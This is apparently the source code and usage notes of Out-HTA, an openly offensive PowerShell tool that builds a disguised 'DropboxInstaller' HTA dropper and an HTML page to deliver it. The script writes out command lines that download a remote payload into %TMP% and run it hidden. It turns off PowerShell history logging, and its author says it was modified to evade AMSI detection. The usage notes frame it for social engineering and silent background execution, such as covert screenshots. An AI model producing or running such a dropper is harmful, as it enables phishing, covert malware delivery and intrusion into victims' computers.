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Out-HTA - Create 'application.hta' and 'webpage.html' for client side attacks!
Create 'application.hta' and 'webpage.html' for client side attacks!
Author: r00t-3xp10it
Tested Under: Windows 10 (19042) x64 bits | Linux kali x64 bits
Required Dependencies: none
Optional Dependencies: Invoke-WebRequest {native}
PS cmdlet Dev version: v2.3.14
This cmdlet creates 'application.hta' and 'webpage.html' for client side attacks.
Application.hta download\execute ps1 scripts\commands while webpage.html its used
to deliver the dropper file (application.hta) using target web browser interface.
_Remark: HTA appl download\execute BAT, PS, VBS, PE (exe) or python scripts!
_Remark: HTA appl accepts: cmd, python or powershell cmdlines to be executed!
_Remark: -PayloadURL '<string>' -PSargs '<-parameter> <arg>' if your script.ps1 contains any parameters!
Credits: Source Code inspired from nishang project and modified to evade amsi string detection and more!
.Parameter Payload
The cmdline for the HTA application to execute!
.Parameter PayloadURL
The remote URL link to be download\executed by HTA
.Parameter Hidden
Hidden HTA terminal console popups? (default: True)
.Parameter HtaName
The HTA file name to be created (default: DropboxInstaller)
.Parameter PSargs
The PS script parameters\arguments to run (default: False)
.Parameter HTML
Create HTML webpage to download the HTA appl? (default: True)
.Parameter Favicon
The icon.ICO (local or url link) to use as HTA\HTML favicon icon
.Parameter HTMLimage
The image.JPG\PNG (local or url link) to use as HTML background image
PS C:\> Get-Help .\Out-HTA.ps1 -full
Access this cmdlet comment based help
PS C:\> .\Out-HTA.ps1 -Payload "powershell echo Executed. > testme.txt"
Generate HTA (to execute payload) and HTML files in current directory!
PS C:\> .\Out-HTA.ps1 -Payload "powershell -noprofile -noexit -C Get-ChildItem" -Hidden False
Generate HTA (exec payload) and HTML files in current dir with HTA appl messageBox (not hidden)
PS C:\> .\Out-HTA.ps1 -Payload "powershell -C Get-ChildItem" -HTMLimage ""
Generate HTA (exec payload) and HTML files in current dir with HTA appl messageBox hidden and set HTML background image
PS C:\> .\Out-HTA.ps1 -PayloadURL "" -Hidden False
Generate HTA (download\exec payload) and HTML files in current directory with HTA appl messageBox (not hidden)
PS C:\> .\Out-HTA.ps1 -PayloadURL "" -HtaName testme
Generate HTA (download\exec payload) and HTML files in current directory but rename application.hta and webpage.html file names to 'testme'
PS C:\> .\Out-HTA.ps1 -PayloadURL "" -PSargs "-Sysinfo verbose" -Hidden False
Generate HTA (download\exec payload with parameters\arguments) and HTML files in current directory with HTA appl messageBox (not hidden)
None. You cannot pipe objects into Out-HTA.ps1
Create HTA and HTML files for client side attacks
Cmdline to execute : powershell -NoExit -C Get-ChildItem
HTML file written to : C:\Users\ragnarok\Desktop\DropboxInstaller.html
_HTA file written to : C:\Users\ragnarok\Desktop\DropboxInstaller.hta
_HTA hidden execution : False
## Non-Positional cmdlet named parameters
[CmdletBinding(PositionalBinding=$false)] param(
$debugMe = "False"
$CmdletVersion = "v2.3.14"
## Global cmdlet variable declarations
$ErrorActionPreference = "SilentlyContinue"
## Disable Powershell Command Logging for current session.
Set-PSReadlineOption –HistorySaveStyle SaveNothing|Out-Null
$host.UI.RawUI.WindowTitle = "@Out-HTA $CmdletVersion {SSA@RedTeam}"
If(Test-Path -Path "$HTAFilePath.hta" -EA SilentlyContinue)
## Del artifacts left behind by previous runs.
Remove-Item -Path "$HTAFilePath.hta" -EA SilentlyContinue -Force
Remove-Item -Path "$HTAFilePath.html" -EA SilentlyContinue -Force
## banner
$mYbANNER = @"
█████╗ ██╗ ██╗████████╗ ██╗ ██╗████████╗ █████╗
██╔══██╗██║ ██║╚══██╔══╝ ██║ ██║╚══██╔══╝██╔══██╗
██║ ██║██║ ██║ ██║ █████╗ ███████║ ██║ ███████║
██║ ██║██║ ██║ ██║ ╚════╝ ██╔══██║ ██║ ██╔══██║
╚█████╔╝╚██████╔╝ ██║ ██║ ██║ ██║ ██║ ██║
╚════╝ ╚═════╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝
Write-Host "$mYbANNER"
If($HTML -ieq "True")
Write-Host "`nCreate HTA and HTML files for client side attacks" -ForeGroundColor Green
Write-Host "-------------------------------------------------"
Write-Host "`nCreate HTA application for client side attacks" -ForeGroundColor Green
Write-Host "----------------------------------------------"
If($Payload -ieq "False" -and $PayloadURL -ieq "False")
## Make sure attacker have sellected at least ONE of the cmdlet mandatory parameters!
Write-Host "[error:] cmdlet requires -Payload '<string>' or -PayloadURL '<url>' arguments!" -ForeGroundColor Red -BackGroundColor Black
Write-Host "";Start-Sleep -Seconds 2
$Help = @"
_Remark: -Payload accepts: cmd, python or powershell cmdlines to be executed!
_Remark: -PayloadURL downloads\executes BAT, PS, VBS, PE (exe) or python scripts!
.Parameter Payload "<string>"
The cmdline for the HTA application to execute!
.Parameter PayloadURL "<url>"
The remote URL link to be download\executed by HTA
PS C:\> .\Out-HTA.ps1 -Payload "powershell echo Executed. > testme.txt"
Generate HTA (to execute payload string) and HTML files in current dir.
_Remark: If executed the HTA creates 'testme.txt' on current directory.
PS C:\> .\Out-HTA.ps1 -PayloadURL ""
Generate HTA (to download\execute sysinfo.ps1 remote script) and HTML files in current directory.
_Remark: If executed the HTA downloads\executes the sysinfo.ps1 from target %tmp% directory.
Write-Host "$Help"
exit ## Exit @Out-HTA
ElseIf($Payload -ne "False" -and $PayloadURL -ne "False")
Write-Host "[error:] cmdlet only accepts ONE mandatory parameter at once -Payload or -PayloadURL" -ForeGroundColor Red -BackGroundColor Black
Write-Host "";Start-Sleep -Seconds 2;Get-Help .\Out-HTA.ps1 -Detailed;exit ## Exit @Out-HTA
If($Payload -ne "False")
If($PSargs -ne "False")
## Config exec parameters!
$cdmline = "$Payload $PSargs"
Write-Host "Cmdline to execute : $cdmline" -ForegroundColor DarkYellow
$cdmline = "$Payload"
Write-Host "Cmdline to execute : $cdmline" -ForegroundColor DarkYellow
If($Hidden -ieq "True")
Author: @r00t-3xp10it
Helper - HTA MessageBox popup's {hidden|visible} state!
$WindowState = "minimize"
$psstring = "powershell -WindowStyle Hidden"
$TermState = ",0,true`n self.close()`n </script>"
$WindowState = "Normal"
$psstring = "powershell -WindowStyle Hidden"
$TermState = "`n </script>"
If($PayloadURL -ne "False")
Author: @r00t-3xp10it
Helper - Config cmdline + download execution parameters!
If($PayloadURL -iNotMatch '^[http(s)://]')
## Make sure we are downloading from network
Write-Host "[error:] This cmdlet only accepts http(s) url links!" -ForeGroundColor Red -BackGroundColor Black
Write-Host "[syntax]" -ForeGroundColor Yellow
Write-Host "";Start-Sleep -Seconds 1;exit ## Exit @Out-HTA
If($PayloadURL -iNotMatch '(.ps1|.bat|.py|.vbs|.exe)$')
## Make sure we are downloading payloadurl accepted extensions!
Write-Host "[error:] cmdlet only accepts (.bat|.ps1|.py|.vbs|.exe) PayloadURL extensions!" -ForeGroundColor Red -BackGroundColor Black
Write-Host "[syntax]" -ForeGroundColor Yellow
Write-Host "";Start-Sleep -Seconds 1;exit ## Exit @Out-HTA
Author: @r00t-3xp10it
Helper - Sellect payload (cmdline) execution based on is extension
Execute {.bat|.ps1|.py|.vbs|.exe} PayloadURL's
Remark: If -Hidden 'False' parameter is sellected then cmdlet will only spawn
HTA messageBox without the downloaded script execution terminal console popup's.
Remark: If $debugMe is activated, then payload execution console will stay open.
$rawName = $PayloadURL.split('/')[-1]
If($PayloadURL -iMatch '(.bat|.vbs)$')
$uuid = "cd $Env:TMP;powershell -WindowStyle Hidden $rawName"
ElseIf($PayloadURL -iMatch '(.ps1)$')
$uuid = "cd $Env:TMP;powershell -WindowStyle Hidden -File $rawName"
ElseIf($PayloadURL -iMatch '(.py)$')
$uuid = "cd $Env:TMP;powershell -WindowStyle Hidden python3 $rawName"
ElseIf($PayloadURL -iMatch '(.exe)$')
$uuid = "cd $Env:TMP;powershell -WindowStyle Hidden .\${rawName}"
If($Hidden -ieq "False" -and $debugMe -ieq "True")
Author: @r00t-3xp10it
Helper - Debug HTA\PS functions! {terminal console visible}
If sellected -Hidden '<false>' and $debugMe = "True" (line 107) then
this function will replace powershell '-WindowStyle Hidden' switch by
powershell -NoExit switch, that maintains the PS terminal consoles open.
$uuid = $uuid -replace '-WindowStyle Hidden','-NoExit'
$psstring = $psstring -replace 'powershell -WindowStyle Hidden','powershell'
If($PSargs -ne "False")
## Parse URL data (remote url cmdlet name)
Write-Host "Cmdline to execute : $PayloadURL $PSargs" -ForegroundColor DarkYellow
$cdmline = "$psstring iwr -Uri $PayloadURL -OutFile $Env:TMP\$rawName;$uuid $PSargs"
Write-Host "Cmdline to execute : $PayloadURL" -ForegroundColor DarkYellow
$cdmline = "$psstring iwr -Uri $PayloadURL -OutFile $Env:TMP\$rawName;$uuid"
#icon="%USERPROFILE%\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico"
$HTAFile = @"
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "">
<html xmlns=""><head>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
<script language="VBScript">
set iOStream = CreateObject("Wscript.Shell")
<script type="text/javascript">
function openURL()
var DropMe = new ActiveXObject("WScript.Shell");
<object type="text/html" data="" width="100%" height="100%">
</object></div><br><center><input type="button" onclick="openURL()" value="LogIn to Dropbox"></center>
$HTMLFile = @"
<link rel="shortcut icon" type="image/jpg" href="$Favicon"/>
<iframe id="frame" src="$HtaName.hta" application="yes" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no>></iframe>
<body background="$HTMLimage">
$htaext = "$HTAFilePath"+".hta" -Join ''
$exthtm = "$HTAFilePath"+".html" -Join ''
## Create HTA\HTML files in current directory!
If($HTML -ieq "True")
Out-File -InputObject $HTMLFile -FilePath "$exthtm"
Write-Host "HTML file written to : $exthtm"
Out-File -InputObject $HTAFile -FilePath "$htaext"
Write-Host "_HTA file written to : $htaext"
If($Hidden -ieq "False" -and $debugMe -ieq "True"){$Hidden = "DebugMe (visible)"}
Write-Host "_HTA hidden execution : $Hidden"
Write-Host "";exit
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r00t-3xp10it commented Jun 27, 2021

:octocat: Out-HTA - Create HTA and HTML files for client side attacks


Author: @r00t-3xp10it
Tested Under: Windows 10 (19042) x64 bits | Linux kali x64 bits
Required Dependencies: none
Optional Dependencies: Invoke-WebRequest {native}
PS cmdlet Dev version: v2.3.14

This cmdlet creates 'application.hta' and 'webpage.html' for client side attacks.
Application.hta download\execute ps1 scripts\commands while webpage.html its
used to deliver the dropper file (application.hta) using target web browser interface.

_Remark: HTA appl download\execute BAT, PS, VBS, PE (exe) or python scripts!
_Remark: HTA appl accepts: cmd, python or powershell cmdlines to be executed!
_Remark: -PayloadURL '<string>' -PSargs '<-Parameter> <arg>' If your script.ps1 contains any parameters\args!
Credits: Source Code inspired from nishang project and modified to evade amsi string detection and mutch more!

:octocat: Create one HTA appl to execute PS cmdline ( HTA messagebox hidden )

.\Out-HTA.ps1 -Payload "powershell echo executed. > testme.txt"


:octocat: Create one HTA appl to Download\Execute GetCounterMeasures.ps1 ( HTA messagebox visible )

 .\Out-HTA.ps1 -PayloadURL "" -Hidden False


:octocat: Create one HTA appl to Download\Execute vbs2exe.exe ( HTA messagebox hidden )

.\Out-HTA.ps1 -PayloadURL "" 


:octocat: [Default] -HTMLimage '<url>' parameter - HTML background image. ( Social Engineering )


:octocat: HTA application messagebox spawn if sellected -Hidden False parameter. ( Social Engineering )


:octocat: Final Notes

Out-HTA cmdlet can be executed on linux distros also ( depending of pwsh installation )..
The next syntax creates in current directory 'DropboxInstaller.hta' and 'DropboxInstaller.html' files, If executed DropboxInstaller.hta downloads 'sysinfo.ps1' to %tmp% dir and silent execute him in background. Sysinfo.ps1 will take one desktop screenshot and will store it on %tmp% dir..

pwsh Out-HTA.ps1 -PayloadURL "" -PSargs "-Screenshot 1"


To Debug -PayloadURL '<url>' HTA\PS functions ( maintain HTA + PS prompt's open during execution )..
Attacker needs to maually edit Out-HTA cmdlet and change $debugMe global variable ( line 107 ) to TRUE.
Save cmdlet changes, and run the cmdlet again using .\Out-HTA.ps1 -PayloadURL "<url>" -Hidden "False" switch's ..

None scans nedded, because the HTA application never contains any 'malicious' code inside.

Special Thanks to: @youhacker55 for having debug Out-HTA cmdlet under Linux ( Kali ) distros.

:octocat: Suspicious Shell Activity { RedTeam } @2021

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